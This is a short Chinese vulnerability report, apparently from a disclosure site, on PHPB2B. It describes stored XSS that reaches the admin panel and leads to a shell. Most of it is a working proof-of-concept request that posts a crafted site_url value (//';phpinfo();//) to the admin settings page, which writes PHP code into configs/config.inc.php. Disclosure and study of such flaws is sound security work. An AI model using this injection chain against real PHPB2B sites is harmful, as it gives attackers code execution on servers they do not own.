漏洞作者: darker
PHPB2B 存在多处xss。
可盲打后台且getshell。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip
详细说明:
ex:
发布供求信息
管理后台审核供求信息:
执行post操作
data[Bsetting][site_url] 存在configs/config.inc.php中。
修改site_url为//';phpinfo();//
pkav.post("http://localhost/phpb2b/pb-admin/setting.php?do=basic","data%5Bsetting%5D%5Bsite_name%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F&data%5Bsetting%5D%5Bsite_title%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91+-+Powered+By+PHPB2B&data%5Bsetting%5D%5Bsite_banner_word%5D=%E6%9C%80%E4%B8%93%E4%B8%9A%E7%9A%84%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99&data%5Bsetting%5D%5Bsite_logo%5D=static%2Fimages%2Flogo.jpg&data%5Bsetting%5D%5Bsite_url%5D=//';phpinfo();//%2F&data%5Bsetting%5D%5Bicp_number%5D=ICP%E5%A4%87%E6%A1%88%E5%8F%B7%E7%A0%81&savebasic=%E6%8F%90%E4%BA%A4",function(rs){});
成功写入configs/config.inc.php
漏洞证明:
写入配置文件
成功执行:
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论